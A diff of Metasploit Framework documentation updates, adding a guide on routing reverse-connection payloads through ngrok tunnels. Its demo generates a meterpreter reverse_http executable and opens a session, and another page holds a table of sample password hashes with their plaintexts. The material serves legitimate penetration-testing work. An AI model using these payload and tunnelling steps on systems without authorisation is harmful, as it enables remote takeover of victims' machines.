+wps-hide-login
+wpshop
+wptouch
+wysija-newsletters
@@ -1,3 +1,3 @@
+bricks
 holding_pattern
 wplms
-bricks
@@ -1,2 +1,10 @@
-Contains `modules_metadata_base.json` which contains information about all modules within Metasploit, as well as
-`schema.rb` which describes current state of the database schema maintained by Rails ActiveRecord.
+This directory contains the following files:
+
+- `modules_metadata_base.json`, which contains information about all modules within Metasploit.
+- `schema.rb`, which is auto-generated from the current state of the database schema maintained by Rails ActiveRecord.
+  This file is auto-generated from the current state of the database.
+
+`schema.rb` is the source Rails uses to define your schema when running `bin/rails db:schema:load`. When creating a new 
+database, `bin/rails db:schema:load` tends to be faster and is potentially less error-prone than running all of your 
+migrations from scratch. Old migrations may fail to apply correctly if those migrations use external dependencies or 
+application code. We _strongly_ recommend that you check this file into your version control system.
@@ -1,5 +1,3 @@
-version: '3'
-
 services:
  ms:
    build:
@@ -1,4 +1,3 @@
-version: '3'
 services:
  ms:
    image: metasploitframework/metasploit-framework:latest
@@ -23,8 +23,8 @@ PARAMS="$@"

 if [[ $PARAMS == *"--rebuild"* ]]; then
  echo "Rebuilding image"
-  docker-compose build
+  docker compose build
  exit $?
 fi

-docker-compose run --rm --service-ports -e MSF_UID=$(id -u) -e MSF_GID=$(id -g) ms ./msfconsole -r docker/msfconsole.rc "$PARAMS"
+docker compose run --rm --service-ports -e MSF_UID=$(id -u) -e MSF_GID=$(id -g) ms ./msfconsole -r docker/msfconsole.rc "$PARAMS"
@@ -1 +1 @@
-3.1.5
+3.2.5
@@ -6,6 +6,7 @@ gem 'just-the-docs', github: 'rapid7/just-the-docs', branch: 'r7_ver_custom'
 #gem 'just-the-docs', path: '../../just-the-docs'
 gem 'webrick'
 gem 'rexml'
+gem 'jekyll-sass-converter', '~> 2.2.0'

 group :jekyll_plugins do
  gem 'jekyll-sitemap'
@@ -12,22 +12,22 @@ GIT
 GEM
  remote: https://rubygems.org/
  specs:
-    addressable (2.8.1)
-      public_suffix (>= 2.0.2, < 6.0)
+    addressable (2.8.7)
+      public_suffix (>= 2.0.2, < 7.0)
    byebug (11.1.3)
    coderay (1.1.3)
    colorator (1.1.0)
-    concurrent-ruby (1.1.10)
+    concurrent-ruby (1.3.4)
    em-websocket (0.5.3)
      eventmachine (>= 0.12.9)
      http_parser.rb (~> 0)
    eventmachine (1.2.7)
-    ffi (1.15.5)
+    ffi (1.17.0)
    forwardable-extended (2.6.0)
    http_parser.rb (0.8.0)
-    i18n (1.12.0)
+    i18n (1.14.6)
      concurrent-ruby (~> 1.0)
-    jekyll (4.3.1)
+    jekyll (4.3.4)
      addressable (~> 2.4)
      colorator (~> 1.0)
      em-websocket (~> 0.5)
@@ -53,46 +53,45 @@ GEM
      jekyll (>= 3.7, < 5.0)
    jekyll-watch (2.2.1)
      listen (~> 3.0)
-    kramdown (2.4.0)
-      rexml
+    kramdown (2.5.1)
+      rexml (>= 3.3.9)
    kramdown-parser-gfm (1.1.0)
      kramdown (~> 2.0)
-    liquid (4.0.3)
-    listen (3.7.1)
+    liquid (4.0.4)
+    listen (3.9.0)
      rb-fsevent (~> 0.10, >= 0.10.3)
      rb-inotify (~> 0.9, >= 0.9.10)
    mercenary (0.4.0)
-    method_source (1.0.0)
+    method_source (1.1.0)
    pathutil (0.16.2)
      forwardable-extended (~> 2.6)
-    pry (0.14.1)
+    pry (0.14.2)
      coderay (~> 1.1)
      method_source (~> 1.0)
    pry-byebug (3.10.1)
      byebug (~> 11.0)
      pry (>= 0.13, < 0.15)
-    public_suffix (5.0.1)
-    rake (13.0.6)
+    public_suffix (6.0.1)
+    rake (13.2.1)
    rb-fsevent (0.11.2)
-    rb-inotify (0.10.1)
+    rb-inotify (0.11.1)
      ffi (~> 1.0)
-    rexml (3.3.6)
-      strscan
-    rouge (4.0.0)
+    rexml (3.4.0)
+    rouge (4.5.1)
    safe_yaml (1.0.5)
    sassc (2.4.0)
      ffi (~> 1.9)
-    strscan (3.1.0)
    terminal-table (3.0.2)
      unicode-display_width (>= 1.1.1, < 3)
-    unicode-display_width (2.3.0)
-    webrick (1.7.0)
+    unicode-display_width (2.6.0)
+    webrick (1.9.1)

 PLATFORMS
  ruby

 DEPENDENCIES
  jekyll (~> 4.3.0)
+  jekyll-sass-converter (~> 2.2.0)
  jekyll-sitemap
  just-the-docs!
  pry-byebug
@@ -103,4 +102,4 @@ DEPENDENCIES
  webrick

 BUNDLED WITH
-   2.2.22
+   2.5.10
@@ -146,7 +146,7 @@ register_options(
  ], self.class)
 ```

-**8. Neglecting to use send_request_cgi()'s vars_get or vars_get when crafting a POST/GET request**
+**8. Neglecting to use send_request_cgi()'s vars_post or vars_get when crafting a POST/GET request**

 ```ruby
 data_post = 'user=jsmith&pass=hello123'
@@ -199,4 +199,4 @@ Metasploit3.new
 ```ruby
 # https://github.com/rapid7/metasploit-framework/issues/3853
 datastore['BAD'] = 'This is bad.'
-```
+```
@@ -59,6 +59,7 @@ Example:
 | CONFIG_CHANGES | Module modifies some config file |
 | IOC_IN_LOGS | Module leaves an indicator of compromise in the log(s) |
 | ACCOUNT_LOCKOUTS | Module may cause an account to lock out |
+| ACCOUNT_LOGOUT | Module may cause an existing valid session to be forced to log out (likely due to restrictions on concurrent sessions)|
 | SCREEN_EFFECTS | Module shows something on the screen that a human may notice |
 | PHYSICAL_EFFECTS | Module may produce physical effects in hardware (Examples: light, sound, or heat) |
 | AUDIO_EFFECTS | Module may cause a noise (Examples: Audio output from the speakers or hardware beeps) |
@@ -112,6 +112,11 @@ end
    * **Reliability** - The Reliability field describes how reliable the session is that gets returned by the exploit, ex: `REPEATABLE_SESSION`, `UNRELIABLE_SESSION`
    * **SideEffects** - The SideEffects field describes the side effects cause by the exploit that the user should be aware of, ex: `ARTIFACTS_ON_DISK`, `IOC_IN_LOGS`, `ACCOUNT_LOCKOUTS`.

+### Non-required fields
+
+* **Stance** - The types of stances an exploit can take, such as passive or aggressive. Stances indicate whether or not the module triggers the exploit without waiting for one or more conditions to be met (aggressive) or whether it must wait for certain conditions to be satisfied before the exploit can be initiated (passive). Passive exploits usually would wait for interaction from a client or other entity for being able to trigger the vulnerability.
+
+* **Passive** - Either `true` or `false` indicates whether or not the exploit should be run as a background job. If for example you know the vulnerability takes an hour to trigger, setting `Passive` to `true` would be beneficial as it allows the user to continue using msfconsole while waiting for a response from the exploit.

 Your exploit should also have a `check` method to support the check command, but this is optional in case it's not possible.

@@ -201,7 +201,7 @@ This data breaks down to the following table:
 | MSCash2                              | mscash2-hashcat    | `$DCC2$10240#tom#e4e938d12fe5974dc42a90120bd9c90f`                                                                                                                                                                                                                     | hashcat      | mscash2              |                                                  | auxiliary/analyze/crack_windows                           |
 | MSSQL (2005)                         | mssql05_toto       | `0x01004086CEB6BF932BC4151A1AF1F13CD17301D70816A8886908`                                                                                                                                                                                                               | toto         | mssql05              | auxiliary/scanner/mssql/mssql_hashdump           | auxiliary/analyze/crack_databases                         |
 | MSSQL                                | mssql_foo          | `0x0100A607BA7C54A24D17B565C59F1743776A10250F581D482DA8B6D6261460D3F53B279CC6913CE747006A2E3254`                                                                                                                                                                       | foo          | mssql                | auxiliary/scanner/mssql/mssql_hashdump           | auxiliary/analyze/crack_databases                         |
-| MSSQL (2012)                         | mssql12_Password1! | `0x0200F733058A07892C5CACE899768F89965F6BD1DED7955FE89E1C9A10E27849B0B213B5CE92CC9347ECCB34C3EFADAF2FD99BFFECD8D9150DD6AACB5D409A9D2652A4E0AF16`                                                                                                                       | Password!    | mssql12              | auxiliary/scanner/mssql/mssql_hashdump           | auxiliary/analyze/crack_databases                         |
+| MSSQL (2012)                         | mssql12_Password1! | `0x0200F733058A07892C5CACE899768F89965F6BD1DED7955FE89E1C9A10E27849B0B213B5CE92CC9347ECCB34C3EFADAF2FD99BFFECD8D9150DD6AACB5D409A9D2652A4E0AF16`                                                                                                                       | Password1!    | mssql12              | auxiliary/scanner/mssql/mssql_hashdump           | auxiliary/analyze/crack_databases                         |
 | MySQL                                | mysql_probe        | `445ff82636a7ba59`                                                                                                                                                                                                                                                     | probe        | mysql                | auxiliary/scanner/mysql/mysql_hashdump           | auxiliary/analyze/crack_databases                         |
 | MySQL SHA1                           | mysql-sha1_tere    | `*5AD8F88516BD021DD43F171E2C785C69F8E54ADB`                                                                                                                                                                                                                            | tere         | mysql-sha1           | auxiliary/scanner/mysql/mysql_hashdump           | auxiliary/analyze/crack_databases                         |
 | Oracle                               | simon              | `4F8BC1809CB2AF77`                                                                                                                                                                                                                                                     | A            | des,oracle           | auxiliary/scanner/oracle/oracle_hashdump         | auxiliary/analyze/crack_databases                         |
@@ -18,7 +18,7 @@ plugin_name_command --option

 The current available plugins for Metasploit can be found by running the `load -l` command, or viewing Metasploit's [plugins](https://github.com/rapid7/metasploit-framework/tree/master/plugins) directory:

-| name             | Description                                                                                         |
+| Name             | Description                                                                                         |
 |------------------|-----------------------------------------------------------------------------------------------------|
 | aggregator       | Interacts with the external Session Aggregator                                                      |
 | alias            | Adds the ability to alias console commands                                                          |
@@ -30,6 +30,7 @@ The current available plugins for Metasploit can be found by running the `load -
 | db_tracker       | Monitors socket calls and updates the database backend                                              |
 | event_tester     | Internal test tool used to verify the internal framework event subscriber logic works               |
 | ffautoregen      | This plugin reloads and re-executes a file-format exploit module once it has changed                |
+| fzuse            | A plugin offering a fuzzy use command                                                               |
 | ips_filter       | Scans all outgoing data to see if it matches a known IPS signature                                  |
 | lab              | Adds the ability to manage VMs                                                                      |
 | libnotify        | Send desktop notification with libnotify on sessions and db events                                  |
@@ -42,12 +43,12 @@ The current available plugins for Metasploit can be found by running the `load -
 | request          | Make requests from within Metasploit using various protocols.                                       |
 | rssfeed          | Create an RSS feed of events                                                                        |
 | sample           | Demonstrates using framework plugins                                                                |
-| session_notifier | This plugin notifies you of a new session via SMS                                                      |
+| session_notifier | This plugin notifies you of a new session via SMS                                                   |
 | session_tagger   | Automatically interacts with new sessions to create a new remote TaggedByUser file                  |
 | socket_logger    | Log socket operations to a directory as individual files                                            |
 | sounds           | Automatically plays a sound when various framework events occur                                     |
 | sqlmap           | sqlmap plugin for Metasploit                                                                        |
-| thread           | Internal test tool for testing thread usage in Metasploit                                          |
+| thread           | Internal test tool for testing thread usage in Metasploit                                           |
 | token_adduser    | Attempt to add an account using all connected Meterpreter session tokens                            |
 | token_hunter     | Search all active Meterpreter sessions for specific tokens                                          |
 | wiki             | Outputs stored database values from the current workspace into DokuWiki or MediaWiki format         |
@@ -18,7 +18,7 @@ Metasploit's DNS configuration is controlled by the `dns` command which has mult

 The current configuration can be printed by running `dns print`:

-```msf6
+```msf
 msf6 > dns print
 Default search domain: N/A
 Default search list:   lab.lan
@@ -23,34 +23,27 @@ msf5 auxiliary(scanner/oracle/oracle_hashdump) > run
 The general steps to getting Oracle support working are to install the Oracle Instant Client and development libraries, install the required dependencies for Kali Linux, then install the gem.

 ## Install the Oracle Instant Client
-As root, create the directory `/opt/oracle`. Then download the [Oracle Instant Client](http://www.oracle.com/technetwork/database/features/instant-client/index-097480.html) packages for your version of Kali Linux. The packages you will need are:
+As root, create the directory `/opt/oracle`. Then download the [Oracle Instant Client](https://www.oracle.com/database/technologies/instant-client/downloads.html) packages for your version of Kali Linux. The packages you will need are:

-* instantclient-basic-linux-12.2.0.1.0.zip
-* instantclient-sqlplus-linux-12.2.0.1.0.zip
-* instantclient-sdk-linux-12.2.0.1.0.zip
+* [instantclient-basic-linux.x64-23.6.0.24.10.zip](https://download.oracle.com/otn_software/linux/instantclient/2360000/instantclient-basic-linux.x64-23.6.0.24.10.zip)
+* [instantclient-sqlplus-linux.x64-23.6.0.24.10.zip](https://download.oracle.com/otn_software/linux/instantclient/2360000/instantclient-sqlplus-linux.x64-23.6.0.24.10.zip)
+* [instantclient-sdk-linux.x64-23.6.0.24.10.zip](https://download.oracle.com/otn_software/linux/instantclient/2360000/instantclient-sdk-linux.x64-23.6.0.24.10.zip)

-Unzip these under `/opt/oracle`, and you should now have a path called `/opt/oracle/instantclient_12_2/`. Next symlink the shared library that we need to access the library from oracle:
-
-```
-root@kali:/opt/oracle/instantclient_12_2# ln libclntsh.so.12.1 libclntsh.so
-
-root@kali:/opt/oracle/instantclient_12_2# ls -lh libclntsh.so
-lrwxrwxrwx 1 root root 17 Jun  1 15:41 libclntsh.so -> libclntsh.so.12.1
-```
+Unzip these under `/opt/oracle`, and you should now have a path called `/opt/oracle/instantclient_23_6/`.

 You also need to configure the appropriate environment variables, perhaps by inserting them into your .bashrc file, logging out and back in for them to apply.

 ```
-export PATH=$PATH:/opt/oracle/instantclient_12_2
-export SQLPATH=/opt/oracle/instantclient_12_2
-export TNS_ADMIN=/opt/oracle/instantclient_12_2
-export LD_LIBRARY_PATH=/opt/oracle/instantclient_12_2
-export ORACLE_HOME=/opt/oracle/instantclient_12_2
+export PATH=$PATH:/opt/oracle/instantclient_23_6
+export SQLPATH=/opt/oracle/instantclient_23_6
+export TNS_ADMIN=/opt/oracle/instantclient_23_6
+export LD_LIBRARY_PATH=/opt/oracle/instantclient_23_6
+export ORACLE_HOME=/opt/oracle/instantclient_23_6
 ```

 If you have succeeded, you should be able to run `sqlplus` from a command prompt:
 ```
-root@kali:/opt/oracle/instantclient_12_2# sqlplus
+root@kali:/opt/oracle/instantclient_23_6# sqlplus

 SQL*Plus: Release 12.2.0.1.0 Production on Tue Mar 26 20:40:24 2019

@@ -64,40 +57,40 @@ Enter user-name:
 First, download and extract the gem source release:

 ```
-root@kali:~# wget https://github.com/kubo/ruby-oci8/archive/ruby-oci8-2.2.7.zip
--2019-03-26 20:31:11--  https://github.com/kubo/ruby-oci8/archive/ruby-oci8-2.2.7.zip
+root@kali:~# wget https://github.com/kubo/ruby-oci8/archive/refs/tags/ruby-oci8-2.2.14.zip
+--2019-03-26 20:31:11--  https://github.com/kubo/ruby-oci8/archive/refs/tags/ruby-oci8-2.2.14.zip
 Resolving github.com (github.com)... 192.30.253.113, 192.30.253.112
 Connecting to github.com (github.com)|192.30.253.113|:443... connected.
 HTTP request sent, awaiting response... 302 Found
-Location: https://codeload.github.com/kubo/ruby-oci8/zip/ruby-oci8-2.2.7 [following]
--2019-03-26 20:31:11--  https://codeload.github.com/kubo/ruby-oci8/zip/ruby-oci8-2.2.7
+Location: https://codeload.github.com/kubo/ruby-oci8/zip/ruby-oci8-2.2.14 [following]
+--2019-03-26 20:31:11--  https://codeload.github.com/kubo/ruby-oci8/zip/ruby-oci8-2.2.14
 Resolving codeload.github.com (codeload.github.com)... 192.30.253.120, 192.30.253.121
 Connecting to codeload.github.com (codeload.github.com)|192.30.253.120|:443... connected.
 HTTP request sent, awaiting response... 200 OK
 Length: unspecified [application/zip]
-Saving to: 'ruby-oci8-2.2.7.zip'
+Saving to: 'ruby-oci8-2.2.14.zip'

-ruby-oci8-2.2.7.zip                     [ <=>                                                                ] 376.97K  2.36MB/s    in 0.2s    
+ruby-oci8-2.2.14.zip                     [ <=>                                                                ] 376.97K  2.36MB/s    in 0.2s    

-2019-03-26 20:31:11 (2.36 MB/s) - 'ruby-oci8-2.2.7.zip' saved [386016]
+2019-03-26 20:31:11 (2.36 MB/s) - 'ruby-oci8-2.2.14.zip' saved [386016]

-root@kali:~# unzip ruby-oci8-2.2.7.zip 
-Archive:  ruby-oci8-2.2.7.zip
+root@kali:~# unzip ruby-oci8-2.2.14.zip 
+Archive:  ruby-oci8-2.2.14.zip
 0c85bf6da2f541de3236267b1a1b18f0136a8f5a
-   creating: ruby-oci8-ruby-oci8-2.2.7/
-  inflating: ruby-oci8-ruby-oci8-2.2.7/.gitignore  
-  inflating: ruby-oci8-ruby-oci8-2.2.7/.travis.yml 
+   creating: ruby-oci8-ruby-oci8-2.2.14/
+  inflating: ruby-oci8-ruby-oci8-2.2.14/.gitignore  
+  inflating: ruby-oci8-ruby-oci8-2.2.14/.travis.yml 
 [...]
-  inflating: ruby-oci8-ruby-oci8-2.2.7/test/test_rowid.rb
-root@kali:~# cd ruby-oci8-ruby-oci8-2.2.7/
+  inflating: ruby-oci8-ruby-oci8-2.2.14/test/test_rowid.rb
+root@kali:~# cd ruby-oci8-ruby-oci8-2.2.14/
 ```

 Install libgmp (needed to build the gem) and set the path to prefer the correct version of ruby so that Metasploit can use it.

 ```
-root@kali:~/ruby-oci8-ruby-oci8-2.2.7# export PATH=/opt/metasploit/ruby/bin:$PATH
+root@kali:~/ruby-oci8-ruby-oci8-2.2.14# export PATH=/opt/metasploit/ruby/bin:$PATH

-root@kali:~/ruby-oci8-ruby-oci8-2.2.7# apt-get install libgmp-dev
+root@kali:~/ruby-oci8-ruby-oci8-2.2.14# apt-get install libgmp-dev
 Reading package lists... Done
 Building dependency tree
 Reading state information... Done
@@ -117,7 +110,7 @@ Setting up libgmp-dev:amd64 (2:5.0.5+dfsg-2) ...
 Build and install the gem

 ```
-root@kali:~/ruby-oci8-ruby-oci8-2.2.7# make
+root@kali:~/ruby-oci8-ruby-oci8-2.2.14# make
 ruby -w setup.rb config
 setup.rb:280: warning: assigned but unused variable - vname
 setup.rb:280: warning: assigned but unused variable - desc
@@ -130,12 +123,12 @@ setup.rb:280: warning: assigned but unused variable - default2
 <--- lib
 ---> ext
 ---> ext/oci8
-/opt/metasploit/ruby/bin/ruby /root/ruby-oci8-ruby-oci8-2.2.7/ext/oci8/extconf.rb
+/opt/metasploit/ruby/bin/ruby /root/ruby-oci8-ruby-oci8-2.2.14/ext/oci8/extconf.rb
 checking for load library path...
  LD_LIBRARY_PATH...
    checking /opt/metasploit/ruby/lib... no
-    checking /opt/oracle/instantclient_12_2... yes
-  /opt/oracle/instantclient_12_2/libclntsh.so.12.1 looks like an instant client.
+    checking /opt/oracle/instantclient_23_6... yes
+  /opt/oracle/instantclient_23_6/libclntsh.so.12.1 looks like an instant client.
 checking for cc... ok
 checking for gcc... yes
 checking for LP64... yes
@@ -144,11 +137,11 @@ checking for ruby header... ok
 checking for OCIInitialize() in oci.h... yes
 [...]
 linking shared-object oci8lib_250.so
-make[1]: Leaving directory `/root/ruby-oci8-ruby-oci8-2.2.7/ext/oci8'
+make[1]: Leaving directory `/root/ruby-oci8-ruby-oci8-2.2.14/ext/oci8'
 <--- ext/oci8
 <--- ext

-root@kali:~/ruby-oci8-ruby-oci8-2.2.7# make install
+root@kali:~/ruby-oci8-ruby-oci8-2.2.14# make install
 ruby -w setup.rb install
 setup.rb:280: warning: assigned but unused variable - vname
 setup.rb:280: warning: assigned but unused variable - desc
@@ -158,5 +151,5 @@ mkdir -p /opt/metasploit/ruby/lib/ruby/site_ruby/2.5.0/
 install oci8.rb /opt/metasploit/ruby/lib/ruby/site_ruby/2.5.0/
 [...]
 <--- ext
-root@kali:~/ruby-oci8-ruby-oci8-2.2.7#
+root@kali:~/ruby-oci8-ruby-oci8-2.2.14#
 ```
@@ -0,0 +1,128 @@
+# Overview
+[ngrok][1] is a popular service that offers free port-forwarding that is easy to setup without needing to run a
+dedicated server on a public IP address (as is the case with SSH, socat and other more traditional options. This means
+that users behind a SNATing device such as a SOHO router can accept reverse shells and other connections without needing
+to configure port forwarding.
+
+**WARNING:** The nature of using ngrok is to send traffic through a third party. ngrok and the server which it utilizes
+are not affiliated with the Metasploit project. Use of ngrok effectively sends traffic through an untrusted third party
+and should be done with extreme caution. While Meterpreter has offered end-to-end encryption since Metasploit 6.0, other
+payloads and connections do not.
+
+ngrok can start multiple types of tunnels. The `tcp` tunnel is compatible with Metasploit's payloads and most closely
+resembles a traditional port-forwarding configuration. The `http` tunnel type is not compatible with payloads, and
+should not be used. The `tls` tunnel type may be compatible, but access to it is restricted to the Enterprise and 
+Pay-as-you-go paid plans. This document will focus on the use cases for the `tcp` tunnel type. Note that one limitation
+is that the public port can not be configured, it is randomly selected by ngrok meaning that the target will need to be
+able to connect to this high, obscure port which may be prevented by egress filtering.
+
+## Usage with payloads
+Use with payloads can be achieved with any of the reverse-connection stagers that accept `LHOST` and `LPORT` options,
+e.g. reverse_tcp, reverse_http, reverse_https, etc. but not reverse_named_pipe. In the following scenario, ngrok will be
+used to forward a random public port to the Metasploit listener on port 4444. This scenario assumes that Metasploit and
+ngrok are running on the same host.
+
+**NOTE:** At this time, payloads handle DNS hostnames inconsistently. Some are compatible with hostnames while others
+require IP addresses to be specified as the target to connect to (the `LHOST` option). To ensure the specified payload
+will work, the hostname provided by ngrok should be resolved to an IP address and the IP address should be used as the
+value for `LHOST`.
+
+1. Start a TCP tunnel using ngrok: `ngrok tcp localhost:4444`.
+1. ngrok should start running and display a few settings, including a line that says "Forwarding". Note the host and
+   port number from this line, e.g. `4.tcp.ngrok.io:13779`
+1. Resolve the hostname from the previous step to an IP address.
+1. Start msfconsole and use the desired payload or exploit module.
+  * Using `msfconsole` for both generating the payload and handling the connection is recommended over using `msfvenom`
+    for two reasons.
+    1. Using `msfvenom` starts up an instance of the framework to generate the payload, making it a slower process.
+    2. Using `msfconsole` to configure both the payload and handler simultaneously ensures that the options are set for
+       both, eliminating the possibility that they are out of sync.
+1. Set the `LHOST` option to the IP address noted in step 3. This is where the payload is expecting to connect to.
+1. Set the `LPORT` option to the port noted in step 2, `13779` in the example.
+1. Set the `ReverseListenerBindAddress` option to `127.0.0.1`. This is where the connection will actually be accepted
+   from ngrok.
+1. Set the `ReverseListenerBindPort` option to `4444`.
+1. Either run the exploit, or generate the payload with the `generate` command and start the handler with `to_handler`
+
+Once the payload has been executed, either through the exploit or manual means, there should be a open connection seen
+through the ngrok terminal.
+
+### Payload Demo
+
+ngrok side:
+```
+$ ngrok tcp localhost:4444
+ngrok                                                           (Ctrl+C to quit)
+
+Take our ngrok in production survey! https://forms.gle/aXiBFWzEA36DudFn6
+
+Session Status                online
+Account                       ????? (Plan: Personal)
+Version                       3.16.0
+Region                        United States (us)
+Latency                       33ms
+Web Interface                 http://127.0.0.1:4040
+Forwarding                    tcp://4.tcp.ngrok.io:17511 -> localhost:4444
+
+Connections                   ttl     opn     rt1     rt5     p50     p90
+                              0       0       0.00    0.00    0.00    0.00
+```
+
+resolve the hostname `4.tcp.ngrok.io` to an IP address
+```
+$ dig +short 4.tcp.ngrok.io
+192.0.2.1
+```
+
+metasploit side:
+```msf
+msf6 > use payload/windows/x64/meterpreter/reverse_http
+msf6 payload(windows/x64/meterpreter/reverse_http) > set LHOST 192.0.2.1
+LHOST => 192.0.2.1
+msf6 payload(windows/x64/meterpreter/reverse_http) > set LPORT 17511
+LPORT => 17511
+msf6 payload(windows/x64/meterpreter/reverse_http) > set ReverseListenerBindAddress 127.0.0.1
+ReverseListenerBindAddress => 127.0.0.1
+msf6 payload(windows/x64/meterpreter/reverse_http) > set ReverseListenerBindPort 4444
+ReverseListenerBindPort => 4444
+msf6 payload(windows/x64/meterpreter/reverse_http) > to_handler 
+[*] Payload Handler Started as Job 2
+msf6 payload(windows/x64/meterpreter/reverse_http) > 
+[*] Started HTTP reverse handler on http://127.0.0.1:4444
+
+msf6 payload(windows/x64/meterpreter/reverse_http) > generate -f exe -o ngrok_payload.exe
+[*] Writing 7168 bytes to ngrok_payload.exe...
+msf6 payload(windows/x64/meterpreter/reverse_http) > 
+[*] http://127.0.0.1:4444 handling request from 127.0.0.1; (UUID: ghzekibo) Staging x64 payload (202844 bytes) ...
+[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:55468) at 2024-09-10 16:43:58 -0400
+
+msf6 payload(windows/x64/meterpreter/reverse_http) > sessions -i -1
+[*] Starting interaction with 1...
+
+meterpreter > getuid
+Server username: MSFLAB\smcintyre
+meterpreter >
+```
+
+## Usage with server modules
+Some modules expect connections to be made to them by the target. These modules can also be used with ngrok, with some
+slight variations to the payload workflow in regards to their datastore options. Modules that start servers can be
+identified by using the `SRVHOST` and `SRVPORT` datastore options.
+
+**NOTE:** Free ngrok plans can only open one tcp tunnel at a time. This means that if the module is an exploit that a
+tcp tunnel for a reverse-connection payload will not be able to be opened at the same time. Use a second ngrok account
+to open a second tcp tunnel and follow the steps above for the payload configuration.
+
+1. Start a TCP tunnel using ngrok: `ngrok tcp localhost:4444`.
+1. ngrok should start running and display a few settings, including a line that says "Forwarding". Note the host and
+   port number from this line, e.g. `4.tcp.ngrok.io:13779`
+1. Resolve the hostname from the previous step to an IP address.
+1. Start msfconsole and use the desired module.
+1. Set the `LHOST` option to the IP address noted in step 3. This is where the payload is expecting to connect to.
+1. Set the `SRVPORT` option to the port noted in step 2, `13779` in the example.
+1. Set the `ListenerBindAddress` option to `127.0.0.1`. This is where the connection will actually be accepted
+   from ngrok.
+1. Set the `ListenerBindPort` option to `4444`.
+1. Run the module
+
+[1]: https://ngrok.com/
@@ -86,8 +86,7 @@ OptSomething.new(option_name, [boolean, description, value, *enums*], aliases: *
  options](#Filtering-datastore-options) section for more information.
 * **fallbacks** *optional*, *key-word only* An array of names that will be used as a fallback if the main option name is
  defined by the user. This is useful in the scenario of wanting specialised option names such as `SMBUser`, but to also
-  support gracefully checking a list of more generic fallbacks option names such as `Username`. This functionality is 
-  currently behind a feature flag, set with `features set datastore_fallbacks true` in msfconsole
+  support gracefully checking a list of more generic fallbacks option names such as `Username`.

 Now let's talk about what classes are available:

@@ -1,4 +1,8 @@
-By default test modules in Metasploit are not loaded when Metasploit starts. To load them, run `loadpath test/modules` after which you should see output similar to the following:
+Metasploit offers inbuilt test modules which can be used for verifying Metasploit's post-exploitations work with currently opened sessions.
+These modules are intended to be used by developers to test updates to ensure they don't break core functionality
+and should not be used during normal operations. These modules also as part of the automated test suite within pull requests.
+
+By default the test modules in Metasploit are not loaded when Metasploit starts. To load them, run `loadpath test/modules` after which you should see output similar to the following:

 ```msf
 msf6 > loadpath test/modules
@@ -9,4 +13,69 @@ Loaded 38 modules:
 msf6 > 
 ```

-These modules are intended to be used by developers to test updates to ensure they don't break core functionality and should not be used during normal operations. If you do happen to break the functionality of one of these modules, it is highly recommended that you look at what you are proposing within your PR and ensure that you are not accidentally breaking unintended functionality. If you do need to break certain functionality in order to add a given feature, and there is no other way to go around this, be sure to let one of the Metasploit team members know this so that appropriate updates can be made to these scripts and any associated code that may be updated by your change (assuming it is has been signed off and approved by the team).
+The modules can be searched for:
+
+```msf
+msf6 > search post/test
+
+Matching Modules
+================
+
+   #   Name                               Disclosure Date  Rank    Check  Description
+   -   ----                               ---------------  ----    -----  -----------
+   0   post/test/cmd_exec                 .                normal  No     Meterpreter cmd_exec test
+   1   post/test/railgun                  .                normal  No     Railgun API Tests
+   2   post/test/extapi                   .                normal  No     Test Meterpreter ExtAPI Stuff
+   3   post/test/get_env                  .                normal  No     Test Post::Common Get Envs
+   4   post/test/services                 .                normal  No     Test Post::Windows::Services
+   5   post/test/all                      .                normal  No     Test all applicable post modules
+... etc etc ...
+```
+
+Example of running the test module against an opened session:
+
+```
+msf6 > use post/test/cmd_exec
+msf6 post(test/cmd_exec) > run session=-1
+...
+[*] Testing complete in 2.04 seconds
+[*] Passed: 6; Failed: 0; Skipped: 0
+[*] Post module execution completed
+```
+
+The `post/test/all` module is an aggregate module that can be used to quickly run all of the applicable test modules
+against a currently open session:
+
+```msf
+msf6 post(test/all) > run session=-1
+
+[*] Applicable modules:
+Valid modules for x86/windows session 1
+=======================================
+
+ #   Name                          is_session_platform  is_session_type
+ -   ----                          -------------------  ---------------
+ 0   test/railgun_reverse_lookups  Yes                  Yes
+ 1   test/search                   Yes                  Yes
+ 2   test/services                 Yes                  Yes
+ 3   test/meterpreter              Yes                  Yes
+ 4   test/cmd_exec                 Yes                  Yes
+ 5   test/extapi                   Yes                  Yes
+ 6   test/file                     Yes                  Yes
+ 7   test/get_env                  Yes                  Yes
+ 8   test/railgun                  Yes                  Yes
+ 9   test/registry                 Yes                  Yes
+ 10  test/unix                     No                   Yes
+ 11  test/mssql                    Yes                  No
+ 12  test/mysql                    Yes                  No
+ 13  test/postgres                 Yes                  No
+ 14  test/smb                      Yes                  No
+
+[*] Running test/cmd_exec against session -1
+[*] --------------------------------------------------------------------------------
+... etc etc ...
+
+[*] Running test/extapi against session -1
+[*] --------------------------------------------------------------------------------
+... etc etc ...
+```
@@ -75,7 +75,7 @@ This module has a selection of inbuilt queries which can be configured via the `
 - `ENUM_COMPUTERS` - Dump all objects containing an objectCategory or objectClass of Computer.
 - `ENUM_CONSTRAINED_DELEGATION` - Dump info about all known objects that allow constrained delegation.
 - `ENUM_DNS_RECORDS` - Dump info about DNS records the server knows about using the dnsNode object class.
- `ENUM_DNS_ZONES` - Dump info about DNS zones the server knows about using the dnsZone object class under the DC DomainDnsZones. This isneeded - as without this BASEDN prefix we often miss certain entries.
+- `ENUM_DNS_ZONES` - Dump info about DNS zones the server knows about using the dnsZone object class under the DC DomainDnsZones. This is needed - as without this BASEDN prefix we often miss certain entries.
 - `ENUM_DOMAIN` - Dump info about the Active Directory domain.
 - `ENUM_DOMAIN_CONTROLLERS` - Dump all known domain controllers.
 - `ENUM_EXCHANGE_RECIPIENTS` - Dump info about all known Exchange recipients.
@@ -96,6 +96,7 @@ This module has a selection of inbuilt queries which can be configured via the `
 - `ENUM_USER_PASSWORD_NEVER_EXPIRES` - Dump info about all users whose password never expires.
 - `ENUM_USER_PASSWORD_NOT_REQUIRED` - Dump info about all users whose password never expires and whose account is still enabled.
 - `ENUM_USER_SPNS_KERBEROAST` - Dump info about all user objects with Service Principal Names (SPNs) for kerberoasting.
+- `ENUM_PRE_WINDOWS_2000_COMPUTERS` - Dump info about all computer objects likely created as a "pre-Windows 2000 computer", for which the password might be predictable.

 ### Kerberos Authentication

@@ -169,7 +169,7 @@ Local File System Commands
 This session also works with the following modules:

  auxiliary/admin/dcerpc/icpr_cert
-  auxiliary/admin/dcerpc/samr_computer
+  auxiliary/admin/dcerpc/samr_account
  auxiliary/admin/smb/delete_file
